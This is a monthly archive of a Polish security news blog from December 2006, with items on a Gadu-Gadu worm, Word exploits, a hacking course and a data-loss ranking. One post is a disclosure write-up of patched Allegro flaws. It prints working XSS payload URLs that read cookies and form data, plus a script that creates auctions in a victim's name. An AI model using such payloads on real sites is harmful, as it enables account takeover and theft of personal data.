Archiwa miesięczne

Grudzień 2006

Zaniedbania w Krajowej Agencji Poszanowania Energii S.A

W przedświątecznej emisji programu „Teraz My” mieliśmy okazję, zapoznać się z całkowitym zaniedbaniem bezpieczeństwa sieci przez administratorów Krajowej Agencji Poszanowania Energii. Niestety, czas antenowy nie pozwolił na dokładne przedstawienie sytuacji.

Wszystkich zainteresowanych działaniami podjętymi przez Pawła Jabłońskiego, zachęcamy do zapoznania się z treścią notatki umieszczoną w jego blogu.
http://paweljablonski.bblog.pl/

Trojan rozpowszechnia się przez sieć Gadu-Gadu

We wtorek wieczorem wielu użytkowników komunikatora Gadu-Gadu otrzymało pojedyncze wiadomości, w których znajdował się jedynie link do strony internetowej. Wiadomość możemy dostać nawet od nieznajomego, wystarczy, że on ma nas na swojej liście kontaktów.

Rozsyłane są wiadomości:

www.google.pl
www.jhjhaliwgpee.info
www.hsqvyrpzeh.info/wcoiyw.jpg
www.sqvyrpzeh.info/?awbiby.jpg
www.hhsqvyrpzeh.info/?awbiby.jpg

Fakt, że link przychodzi jako pojedyncza wiadomość, każe przypuszczać, że do użytkowników GG trafia jako zagnieżdżony w rozmowie obrazek. Ludzie, którzy rozsyłają linki, nie mają pojęcia, o co chodzi, bo – jak twierdzą – nic nie wysyłali.

Użytkownik Smalu deobfuskował kod strony (wysyłany jest tylko do użytkowników IE), wygląda na to, że do wstrzyknięcia używa techniki Trojan-Downloader.JS.Agent.ab, dalej nie wiadomo, co (oprócz rozsyłania linka dalej) robi sam trojan.

Problem dotyczy również użytkowników przeglądarki Mozilla Firefox z aktywną wtyczką Windows Media Player, przez którą uruchamiany jest kod robaka. Można się przed tym uchronić poprzez wyłączenie wtyczki WMP. Można to zrobić wpisując w pasek adresu about:config. Odnajdujemy klucz plugin.scan.WindowsMediaPlayer i ustalamy jego wartość na 12.0.

Po uruchomieniu robak skanuje dysk w poszukiwaniu plików profilu Gadu-Gadu – gromadzi hasła do kont oraz kontakty.

Dane te są następnie wykorzystywane do rozesłania złośliwych linków.

Takie działanie może powoduje złudną obsługę komunikatorów innych niż Gadu-Gadu, gdyż wielu z ich użytkowników posiada na swoich dyskach profile programu Gadu-Gadu.

Warto wspomnieć że sposób rozprzestrzeniania się robaka sam w sobie zawiera mechanizm automatycznej aktualizacji – każda z ofiar pobiera na swój dysk najbardziej aktualną wersję.

Nie jest znane szkodliwe działanie (poza rozprzestrzenianiem się) obecnych wersji, lecz kolejne wersje robaka mogą zawierać kod którego szkodliwość będzie dużo wyższa.

W kodzie robaka znaleziono tagi kilkunastu emotikon, co wskazuje na to że wiadomości mogą znacznie różnić się od wymienionych wyżej schematów (chociaż nie jest to potwierdzone).

Robak krążył po Internecie już od początku listopada, ten atak to jego nieco bardziej rozwinięta wersja, której pierwsze symptomy (jak atak na Firefoksa) pojawiły się około miesiąca temu.

Masowe wysyłanie wiadomości do użytkowników z listy kontaktów komunikatora powoduje także, że działanie zaczyna filtr antyspamowy serwerów Gadu-Gadu i wiadomości wychodzące i przychodzące do konta zarażonego zostają zablokowane na jakiś czas.

Exploit jest, przynajmniej na ten moment, ściągany zawsze z tego samego adresu.

Wystarczy więc na firewallu wyciąć adresy zamieszane w aferę (64.202.189.170 – strona do której prowadzi pierwszy link, 66.185.126.34 – ostateczny kod robaka), by zaznać chwilowego przynajmniej spokoju. Dokonano już tego w wielu sieciach osiedlowych.

Źródło: Wikinews
DI: Nowa fala złośliwych linków na Gadu-Gadu

Allegro pełne dziur! – jak to było?

Teraz, kiedy cała sprawa już trochę przycichła a, co najważniejsze, zgłoszone błędy zostały poprawione mam możliwość przedstawienia na czym dokładnie polegał znaleziony przeze mnie błąd w skryptach administracyjnych Allegro i w jaki sposób można to było wykorzystać.

Zaznajomieni z tematem wiedzą, że całość opierała się głównie na luce XSS (Cross-Site Scripting) w oparciu o którą instniała możliwość swobodnego manipulowania kodem źródłowym strony i treścią na niej zawartą.
Analiza kodu źródłowego

Przeglądając kod źródłowy strony zawierającej dane aukcji znajdujemy kod podobny do tego: <a href=/my_allegro.php?page=favourites>Ulubione</a>. Nie ma cudzysłowów otaczających wartość atrybutu href, więc mamy podstawę do podjęcia próby znalezienia błędu.
Podstawa do dalszej analizy

Okazuje się jednak, że wartości parametrów przekazywanych do my_allegro.php są prawidłowo filtrowane, więc w tym miejscu niczego nie znajdziemy. Sprawdzamy więc, czy do stworzenia adresu URL wykorzystywana jest zmienna $_SERVER[‚PHP_SELF’] i czy jej wartość jest prawidłowo filtrowana; wywołujemy URL http://allegro.pl/my_allegro.php/abc?page=favourites – znajdujemy w kodzie ciąg znaków abc, a jako, że nie ma cudzysłowów próbujemy zwyczajnie zamknąć znacznik odnośnika wywołując z kolei http://allegro.pl/my_allegro.php/%3E?page=favourites

http://allegro.pl/my_allegro.php/>?page=favourites

Ku naszemu zadowoleniu udaje się. Możemy więc bez problemu odczytać wartości ciasteczek: http://allegro.pl/my_allegro.php/%3E%3Cscript%3Ealert(
document.cookie)%3C/script%3Epe=set_my

http://allegro.pl/my_allegro.php/><script>alert(
document.cookie)</script>pe=set_my
Powiększamy kod źródłowy strony

Skoro można dołączyć dowolny kod źródłowy, to praktycznie sprawa jest zakończona. Jednak fajnie by było, gdyby dało się wykorzystywać cudzysłowa aby umieścić bardziej skomplikowany kod JavaScript. Niestety, cudzysłowa są filtrowane i w tradycyjny sposób ich nie wykorzystamy. Nic straconego, bo jest w końcu funkcja String.fromCharCode, która na podstawie przekazanych kodów ASCII zwraca łańcuch znaków z nich złożony. Próbujemy więc wyświetlić dane osobowe: http://ssl.allegro.pl/my_allegro.php/%3E%3Cscript%3Ewindow.onload=
function()%7Ba=document.getElementsByTagName(String.fromCharCode(105,110,
112,117,116));for(b=0;b%3Ca.length;b++)alert(a%5Bb%5D.value);%7D%3C/script%3E
?page=settings&type=set_my

http://ssl.allegro.pl/my_allegro.php/><script>window.onload=
function(){a=document.getElementsByTagName(String.fromCharCode(105,110,
112,117,116));for(b=0;b<a.length;b++)alert(a[b].value);}</script>
?page=settings&type=set_my
Sprzedajemy

Wystawienie aukcji nie wymaga ponownego zalogowania, więc możemy stworzyć skrypt, który wystawi aukcję automatycznie, bez wiedzy użytkownika. Opierając się na wcześniejszym kodzie dołączamy do strony element script z odwołaniem do pliku .js na naszym serwerze. Analizując zachowanie panelu administracyjnego podczas wystawiania aukcji i mając na oku przesyłane do serwera dane tworzymy skrypt, wykorzystujacy obiekt XMLHttpRequest wystawiający aukcję:

var xhr;
var auctionTitle = ‚Tytul’;
var auctionDescr = ‚Opis’;
if (typeof XMLHttpRequest != ‚undefined’)
xhr = new XMLHttpRequest(); else
xhr = new ActiveXObject(‚Microsoft.XMLHttp’);
xhr.onreadystatechange = function() {
if (xhr.readyState != 4) return;
var r = xhr.responseText;
var uniqid = new RegExp(‚item_unique_key” value=”([a-z0-9]+)”‚).exec(r)[1];
xhr.abort();
xhr.onreadystatechange = function() {
if (xhr.readyState != 4) return;
// Done.
}
xhr.open(‚POST’, ‚/add_item.php’, true);
xhr.setRequestHeader(‚Content-type’, ‚application/x-www-form-urlencoded’);
xhr.send(‚var_appendix=00&wysiwyg=2&item_unique_key=’+uniqid);
}
xhr.open(‚POST’, ‚/new_item_preview.php’, true);
xhr.setRequestHeader(‚Content-type’, ‚application/x-www-form-urlencoded’);
xhr.send(‚var_appendix=00&item_country=1&starting_time_00=
&category=28118&auction_type=buy_now&explicit_content=0
&item_name=’+encodeURIComponent(auctionTitle)+’&counter_info=
+45&no_attribs=1&description=’+encodeURIComponent(auctionDescr)
+’&wysiwyg=2&select_cat=&load_foto=&remove_foto=&select_sell_type=
&force_txt=&foto=&foto_path=&load_foto_auto=0&buy_now_price=1000000
&sell_quantity=1&sell_by_set=&future_active=0&auction_duration=7
&selected_country=1&state=7&location=Warszawa&transport=buyer
&transport_shipment=on&wire_transfer=on&postage_transfer=
&ask_for_payu=on&counter_trans=+500’);
Tyle

Nic więcej nie jest już potrzebne. Z pomocą stworzonego wcześniej kodu możemy bez problemu przesłać do siebie dane osobowe, nazwę użytkownika i hasło (korzystając z RCSR) czy listę aukcji, a prawdę mówiąc wystarczy sama wartość ciasteczek, bo z powodu luki Session Fixation ustawienie czyjegoś identyfikatora sesji u siebie i odświeżenie strony wystarcza, aby przeglądać panel administracyjny jako ta osoba.

Co było nie tak?

Raz – atrybuty znaczników powinny być otoczone cudzysłowami. Trzeba pamiętać, że nie chodzi tu tylko o kosmetykę, ale także bezpieczeństwo. Gdyby były, to nawet fakt, że występowała luka XSS, nie dało by się jej wykorzystać, bo cudzysłowa i inne kluczowe dla HTML znaki były poprawnie filtorwane przez skrypty Allegro. Dwa – nie wolno zapominać, że tablica $_SERVER również zawiera dane pochodzące z zewnątrz, którymi trzeba się przyjrzeć przed wypisaniem ich na stronie. Dotyczy to także zmiennej $_SERVER[‚PHP_SELF’], która najprawdopodobniej była zwyczajnie wyświetlana bez uprzedniej filtracji.
Uwaga: Powyższy opis ma charakter czysto edykacyjny i tak też proszę go traktować. Opis dotyczy skryptów administracyjnych Allegro przed nałożonymi niedawno poprawkami (aktualny dnia 11.12.2006).

Żródło: własne

Zobacz również:

Allegro wydało oświadczenie
Allegro milczy i zapowiada przerwę techniczną
Allegro pełne dziur!

Allegro pełne dziur!

Allegro jest największym polskim serwisem aukcyjnym, którego codziennie używają tysiące osób sprzedając i kupując rozmaite przedmioty. Każda z tych akcji wymaga zalogowania się do części „Moje Allegro” której, jak się okazało, poziom bezpieczeństwa jest równy zeru, a co jednocześnie nie za bardzo interesuje pracowników Allegro, bo pomimo wysłania dwóch maili z konkretnymi przykładami ataków pozostały one bez odzewu.

Znalezienie kilku błędów w skryptach administracyjnych Allegro zajęło dokładnie 3 minuty wliczając czasy ładowania się dokumentów HTML i grafik.

Błędy te są bardzo poważne, o czym może świadczyć fakt, że osoba atakująca, z pomocą spreparowanego adresu URL, może bez większego trudu wykraść wszystkie dane osobowe (łącznie z adresem i numerem telefonu), nazwę użytkownika i hasło, listę wystawionych i obserwowanych aukcji itd.

Można także bez większego problemu dostać się do danych związanych z sesją, aby, po ustawieniu identycznych wartości u siebie, przeglądać część administracyjną już jako zaatakowana osoba.

Plusem systemu Allegro jest fakt, że przed wykonaniem kluczowych operacji pyta o nazwę użytkownika i hasło (co traci sens, jeśli da się je wykraść, ale zawsze).

Jednak, co ciekawe, wystawienie nowej aukcji nie należy do tej grupy akcji i podczas próby ataku można swobodnie wystawić aukcję w dowolnej kategorii, o dowolnym tytule, opisie i kwocie kupna, której właścicielem będzie atakowana osoba.

Spreparowany adres URL można oczywiście przepuścić najpierw przez jeden z wielu serwisów służących do generowania krótszych adresów, umieścić go w ukrytym IFRAME pod dowolną domeną lub wewnątrz wiadomości e-mail, co praktycznie uniemożliwia skuteczne wykrycie ataku.

Całość sprowadza się do tego, że nie tylko panel administracyjny Allegro jest podatny na takie ataki jak XSS (Cross Site Scripting), CSRF (Cross-Site Request Forgery) i Session Fixation, a w konsekwencji i na RCSR oraz Session Riding, ale również o to, że ignorancja pracowników Allegro może przekształcić się w spory problem dla niczego nieświadomych użytkowników.

Źródło: własne

Oto dowody:

Allegro milczy i zapowiada przerwę techniczną

Nasza dzisiejsza publikacja dot. skandalicznych zaniedbań bezpieczeństwa użytkowników serwisu aukcyjnego Allegro.pl odbiła się szerokim echem w polskim internecie.

Nic dziwnego, skoro do tej pory praktycznie każdy użytkownik był skazany na łaskę osób, które doskonale wiedziały, że błędy w oprogramowaniu dają im pełną kontrole nad kontem każdego handlującego na Allegro.

Jak do tej pory nikt z pracowników Allegro nie pofatygował się na kontakt z naszą redakcją pomimo, że wiemy z całą pewnością, że są doskonale zorientowani w całej sytuacji.

Tym bardziej, że jak do tej pory udało im się ‚naprawić’ podatny kod jedynie pod kątem ataków XSS (Cross Site Scripting)…

Z zespołem Allegro kontaktowała się m.in. redakcja serwisu IT Biznes, powołując się na nasze informacje.

W odpowiedzi, na którą jak sami przyznali musieli czekać dość długo, Patryk Tryzubiak (PR Manager Allegro) oznajmił, że platforma aukcyjna nie jest jeszcze w stanie ustosunkować się do zarzutów oraz że trwają prace nad weryfikacją informacji o lukach.

Redakcja IT Biznes została zapewniona, że pełnej odpowiedzi w tej sprawie przedstawiciele Allegro udzielą w dniu jutrzejszym.

Dziś o 16:11 Krzysztof Pietrzak, z zespołu Allegro zapowiedział na Café Allegro (wewnętrznym forum serwisu) przerwę techniczną w nocy ze środy na czwartek (20/21 grudnia) co zaskutkuje niedostępnością serwisu w godzinach od 1:00 do 2:00. Sprawę tą chyba najlepiej skomentowali sami użytkownicy Allegro:
Autor: fiord data: 19-12-06 16:59

Dlaczego dopiero ze środy na czwartek ??!!!!! Po kompromitacji jaką jest niewątpliwie odkryta podatność serwisu na ataki i kompletnym brakiem zabezpieczenia użytkowników allegro, o czym napisał jeden z polskich serwisów zajmujących się bezpieczeństwem sieciowym, każda kolejna minuta działania serwisu bez załatania luk jest farsą ! Przerwa techniczna powinna nastąpić natychmiast i Allegro dobrze o tym wie.

Autor: m_i_n data: 19-12-06 18:25

„wszystkie oferty sprzedaży, których czas zakończenia przypada na ten okres”

A co z reszta ofert? przeciez kupujac wystawienie aukcji na na przyklad 7 dni oplata pobierana jest za 7 dni a nie za 7dni – 1godzina… wg. mnie jest to oszustwo. Ost. tak duzo jest awarii ze ci co maja pecha moga i 2,3 godziny stracic. Ja rozumiem ze to nie duzo no ale wkoncu placimy cene, co do grosza wiec dobrze by bylo aby usluga z racji tego nie byla „wybrakowana”.

Autor: gandzias data: 19-12-06 18:29

Witam
Wiem jedno to jak zachowuje się allegro to jest jedna wielka kpina.
Na allegro działam już 4 lata i przez te 4 lata zawsze ale to zawsze musięliście mieć jakieś problemy techniczne przez co wiele z moich aukcji nie skończyło się tak jak należy.
A co z tymi ludźmi [kupującymi] którzy w ostatniej chwili chcięli coś zakupić? Mają wała.
Dzięki komu? Dzięki partaczom z allegro.
Jeszcze raz chciałbym podkreślić że działania allegro to jedna wielka kpina a tym bardziej i ch pseudo zabezpieczenia. Z bardzo dobrych źródeł wiem że o niektórych błędac o którym mowa na hacking.pl byli już poinformowaniu kilka miesięcy wcześniej.
Więc sami widzicie jaka z nich niepoważna firma.
Tylko jak trzeba obdoić sprzedającego to nic im nie nawala.

Autor: sebek_chemik data: 19-12-06 20:19

Ehh, moglibyście przynajmniej podać dokładny powód tej przerwy?
A tu linki do artykułów:
http://itbiznes.pl/art23874.html
http://hacking.pl/6344

Autor: kwawer (129) data: 19-12-06 20:40

A tak chwalili się, że nie są dziurawi, że są bezpieczni. Szkoda słów.

Parafrazując słowa poprzednika:
„Tylko obdajacie sprzedających”

W sumie to niech się za was prokuratura weźmie wszak istnieje u nas w kraju ustawa o ochronie danych osobowych. A przez waszą dziurę możliwe jest ich ukradzenie.

Pozdrowienia dla ludzi z hacking.pl za to, że postąpili jak ludzie, wszak zawsze mogli tą informacje o dziurach najpierw opublikować na forum internetowym, a allegro dowiedziałoby się o tym po fakcie i padłoby z powodu wypłaty pozwów.

Chcę zgłębić tajemnice hackingu
Allegro pełne dziur! – jak to było?
Allegro wydało oświadczenie
Allegro pełne dziur!

Hackowanie na żywo w TVN!

We wtorek gościem najlepszego show politycznego w Polsce „Teraz MY” (22:30) – programu Dziennikarzy Roku 2006 – będzie nasz redakcyjny kolega Paweł Jabłoński, który zademonstruje na żywo jak łatwo jest się włamać do polskich serwerów rządowych!

Tematem przewodnim programu będzie kwestia bezpieczeństwa serwerów rządowych.

Paweł Jabłoński – osoba powszechnie kojarzona w kraju pod kątem bezpieczeństwa sieci.

Za jego sprawą na jaw wyszły skandaliczne nieprawidłowości w Instytucie Energii Atomowej w Świerku.

Współpracując z Życiem Warszawy, która opisała cały proceder na swoich łamach przekazał sprawę Agencji Bezpieczeństwa Wewnętrznego.

„Problematyka bezpieczeństwa sieci instytucji rządowych jest przez polską politykę totalnie pomijana, nie mamy w rządzie nikogo, kto mógłby wziąć na swoje barki realizację nowelizacji ustaw w aspektach bezpieczeństwa oraz stworzenia sprawnie działającej struktury informatyczynej, która zapewniłaby bezpieczeństwo poufności kluczowych dla obronności narodu danych” – powiedział dla hacking.pl Paweł Jabłoński.

Wszystkich zainteresowanych problematyką bezpieczeństwa serwerów rządowych zapraszamy do oglądania „Teraz My” – programu Tomasza Sekielskiego & Andrzeja Morozowskiego we wtorek o godzinie 22:30 w TVN.

Polecamy!
http://paweljablonski.bblog.pl

Dziurawy jak Word

Pojawił się szkodliwy kod, który wykorzystuje krytyczną lukę w programie Microsoft Word.

To już trzecia dziura, o której dowiedzieliśmy się w ciągu ostatnich dni. Szkodliwy kod został udostępniony na hakerskiej witrynie Milw0rm.com. Korzysta z nieznanej wcześniej luki.

Eksperci informują, że, podobnie jak to miało miejsce w dwóch poprzednich wypadkach, pozwala on na uruchomienie nieautoryzowanego oprogramowania na zaatakowanym komputerze.

Luki w Wordzie wykorzystywane są do przeprowadzania bardzo wyspecjalizowanych ataków. Niewielkiej grupie internautów cyberprzestępcy wysyłają specjalnie spreparowane dokumenty Worda.

Przykładem może być atak z ostatniej niedzieli, kiedy to takie właśnie dokumenty odebrały osoby ze ścisłego kierownictwa jednej z firm.

Wszystkie trzy dziury nie stanowią większego niebezpieczeństwa dla przeciętnego internauty, poważnie jednak martwią niektóre z przedsiębiorstw.

Źródło: Arcabit

Szkoła Hakerów – czy będzie ocenzurowana?

Opisywany przez nas kilka miesięcy temu zestaw edukacyjny Szkoła Hakerów doczekał się wznowienia nakładu. Wydawca zestawu jest zaskoczony tempem, w jakim wyprzedany został pierwszy nakład.
Kurs został stworzony z myślą o niewielkiej grupie osób, na poważnie zainteresowanych hackingiem, a okazało się, że takich osób jest w Polsce… bardzo dużo.

Jest to jednocześnie oznaka, że wzrasta w społeczeństwie świadomość zagrożeń, jakie pojawiają się w codziennym korzystaniu z Internetu.

Pojawiły się pogłoski, iż jeden z rozdziałów podręcznika – „Przechwytywanie informacji w sieciach LAN” może zostać usunięty.

Wydawca potwierdza, iż otrzymał w tej sprawie szereg e-maili, w których treść tego rozdziału została uznana za „potencjalnie niebezpieczną”, jednak nie skomentował pogłosek o możliwości usunięcia rozdziału.

W rozdziale tym opisywane są techniki monitorowania ruchu sieciowego, od dawna znane administratorom i specjalistom od bezpieczeństwa. Nie jest też tajemnicą, że niektórzy hakerzy stosują je do infiltracji i „szpiegowania”.

Jak dotąd, Szkoła Hakerów jest jedynym w Polsce opracowaniem przedstawiającym praktyczne techniki hakerskie w sposób przystępny dla szerokiego grona odbiorców.

Zestaw jest kupowany równie chętnie przez osoby początkujące, które zainspirowane „legendami” o hakerach, postanowiły poznać „od środka” metody ich działań i sprawdzić się w tym „fachu”, jak i przez programistów oraz przedstawicieli firm zajmujących się bezpieczeństwem sieciowym.

Zestaw cieszy się tak dużym powodzeniem prawdopodobnie dzięki jego 3-częściowej konstrukcji, w skład wchodzą: podręcznik, filmy szkoleniowe oraz LiveCD z systemem operacyjnym.

Każdy rozdział stanowi jedną ‚lekcję’ hackingu, większość z nich zilustrowana jest odpowiednim, bardzo szczegółowym filmem.

Dzięki temu, czytelnik może z łatwością wypróbować w praktyce (za pomocą dołączonego systemu) wszystkie omawiane techniki i poczuć się jak uczestnik prawdziwego wykładu „na żywo”.

Dokładniejszą recenzję zestawu Szkoła Hakerów przedstawiliśmy już kilka miesięcy temu.

Zachęcamy do zapoznania się z tą pozycją wszystkich zainteresowanych zwłaszcza, iż mimo popularności, jaką cieszy się szkolenie, wydawca postanowił nadal utrzymać stosunkowo niską cenę – za granicą tego typu szkolenia są kilka- lub nawet kilkanaście razy droższe.

Serwis Hacking.pl w porozumieniu ze Szkołą Hakerów proponuje Państwu 10% zniżkę na zakup zestawu. Aby otrzymać zniżkę należy w polu formularza zamówieniowego wpisać kod 871390.

Serwis Szkoła Hakerów zastrzega sobie możliwość zakończenia akcji promocyjnej po wyczerpaniu się nakładu zestawów promocyjnych.

Promocja cenowa zestawu – Szkoła Hakerów
Szkoła Hakerów

10 najoryginalniejszych przypadków utraty danych

Ontrack zaprezentował tegoroczną edycję rankingu najoryginalniejszych przypadków utraty danych. W Polsce zwyciężył Liroy. Muzyk stracił całą swoją najnowszą płytę na dwa tygodnie przed oficjalną premierą.

– Tegoroczna lista pokazuje, że utrata danych może przydarzyć się praktycznie w każdych warunkach – mówi Paweł Odor, główny specjalista Ontrack Odzyskiwanie Danych.

– Niezależnie od tego w jak dramatycznych okolicznościach tracimy zasoby warto skonsultować się ze specjalistami odzyskiwania danych ponieważ szanse na przywrócenie informacji są ogromne.

Przykład Liroya pokazuje, że czasem specjaliści mogą odzyskać dane i przywrócić nadzieję.

W tym przypadku nadzieję fanów na terminowe ukazanie się długo wyczekiwanej płyty muzyka – dodaje Odor.

Lista najoryginalniejszych przypadków utraty danych w 2006 roku wg Ontrack
10. Helikopterowa w(y)padka

W Monako pracownicy międzynarodowej firmy telekomunikacyjnej wypuścili laptop z helikoptera, w którym pracowali. Ontrack odzyskał kluczowe dane i następnego dnia po wypadku udostępnił informacje przez serwer FTP (miejsce składowania danych dostępne dla użytkowników w różnych lokalizacjach). Dane zostały wykorzystane podczas konferencji firmy w Hong Kongu.

9. Najpierw umyj… dane

Podczas lotu z Londynu do Warszawy pasażer spakował laptop i kosmetyki do jednej torby. Jego szampon nie był dokręcony. Ciecz zalała całą zawartość torby w tym komputer, którego dysk twardy odmówił posłuszeństwa. Żeby odzyskać dane inżynierowie Ontracka najpierw musieli wziąć urządzenie… pod prysznic.

8. Apel komika

Brytyjski komik Dom Joly, prezenter i współtwórca popularnego na wyspach programu nagrywanego ukrytą kamerą – Trigger Happy TV, upuścił laptop. Uszkodzony wskutek upadku dysk twardy zawierał jedenaście tysięcy zdjęć i piosenek, połowę książki, nad którą pracował Joly i jego wszystkie artykuły prasowe. Komik opisał swój przypadek w jednej z gazet. Ontrack, po lekturze artykułu, skontaktował się z Joly i zaproponował pomoc. Udało się odzyskać wszystkie dane.

7. Badania w ogniu

W jednym z wiodących uniwersytetów brytyjskich strażacy gasząc pożar zalali komputery wydziału informatycznego zawierające wyniki badań naukowców. Specjaliści Ontracka zostali wezwani do uniwersytetu. Odzyskali wyniki badań zapisanych w 30 mokrych i nadpalonych komputerach.

6. Nie ufaj bananom

Jeden z klientów Ontracka zostawił nieświeżego banana na przenośnym, zewnętrznym dysku twardym. Owoc rozkładając się zalał wnętrze urządzenia. Dysku nie można było uruchomić. Specjaliści oczyścili jego wnętrze. Udało się uruchomić nośnik na czas procesu odzyskiwania danych. Niestety nie udało się uratować banana.

5. Mechaniczni pogromcy danych

To zdarza się co roku, a ludzie nadal zostawiają swoje komputery na drodze pojazdów. Tylko w tym roku Ontrack odzyskał dane z laptopa, po którym przejechał autobus przewożący pasażerów na lotnisku oraz z kilku zewnętrznych dysków twardych, upchanych w plecaku, po którym przejechała cofająca ciężarówka.

4. Dobry format to podstawa

Mężczyzna sformatował swój dysk nie raz ani dwa, ale aż 10 razy zanim zorientował się, że na dysku były dane, które będą mu potrzebne. Szczęśliwie informacje udało się odzyskać… za pierwszym razem.

3. Szukając Nemo

Użytkownik wodoszczelnego aparatu wrócił z podróży życia na Barbados. Chciał obejrzeć zdjęcia, które robił pod wodą podczas nurkowania. Niestety aparat nie okazał się tak szczelny jak w reklamie. Inżynierowie Ontracka odzyskali wszystkie zdjęcia kolorowych rybek, które uwiecznił nurek-fotograf.

2. Naukowo wyciszony komputer

Z napędu komputera należącego do profesora prowadzącego wykład zaczął dochodzić pisk. Żeby rozwiązać rozpraszający problem wykładowca otworzył napęd i wtrysnął do środka płyn WD-40. Operacja uciszyła napęd i … cały komputer. Dane odzyskano w specjalistycznym laboratorium.

I najoryginalniejszy przypadek utraty danych w 2006 roku na świecie…

1. Skarpety bezpieczeństwa

W tym przypadku najważniejsze nie były przyczyny utraty danych,
a sposób dostarczenia nośnika do Ontracka. Klient nadał przesyłkę z nośnikiem, z którego utracił dane, w brudnych skarpetach. Tak zabezpieczony dysk uległ dalszym uszkodzeniom podczas transportu. Dane udało się odzyskać. Klient zapewnił, że w przypadku kolejnej utraty danych dostarczy już nośnik
w trwalszym opakowaniu.

… oraz w Polsce

1. Utracony „Scyzoryk”

Liroy – pionier polskiej sceny rap, autor jednej z najpopularniejszych piosenek rap lat 90, utworu „Scyzoryk” stracił nagrania ze swojej najnowszej płyty „L-Niño, Vol.1” na dwa tygodnie przed oficjalną premierą.

Zawiódł komputer w studio nagrań. Utwory na najnowszy krążek muzyka były nagrywane wspólnie z wykonawcami z kraju i z zagranicy.

Ich odtworzenie nie było możliwe. Dane udało się odzyskać w dwa dni i 27 listopada, tak jak planowano, ukazał się nowy album Liroya.

To nie pierwsze kłopoty muzyka z danymi. Siedem lat wcześniej, podczas nagrywania płyty „Dzień Szaka-L’a”, w studio nagrań uderzył piorun. Utwory zostały bezpowrotnie stracone.

Jedna z odzyskanych piosenek znajduje się w Internecie pod adresem www.ontrack.pl/liroy.

Źródło: informacja prasowa

Szantażyści zaatakowali Hotmail

Użytkownicy hiszpańskojęzycznej wersji serwisu pocztowego Hotmail, padli ofiarą szantażu.

Cyberprzestępcy włamują się na ich skrzynki pocztowe, kopiują wszystkie wiadomości oraz książkę adresową, a następne kasują zawartość konta.

Na koncie pozostaje jedynie list od przestępców, którzy żądają pieniędzy za oddanie listów. W przeciwnym razie grożą ich skasowaniem.

Firma Websense informuje, że nazwy użytkownika oraz hasła do kont zostały zdobyte przez cyberprzestępców w kafejkach internetowych, dzięki zainstalowanemu tam oprogramowaniu szpiegującemu.

Szantaż to nic nowego w cyfrowym świecie. Istnieją konie trojańskie, które szyfrują ważne pliki na zainfekowanym komputerze i domagają się okupu za hasło dostępu.

Zdarza się również, że cyberprzestępcy grożą firmom atakiem DDoS jeśli te nie zapłacą im pieniędzy.

Źródło: Arcabit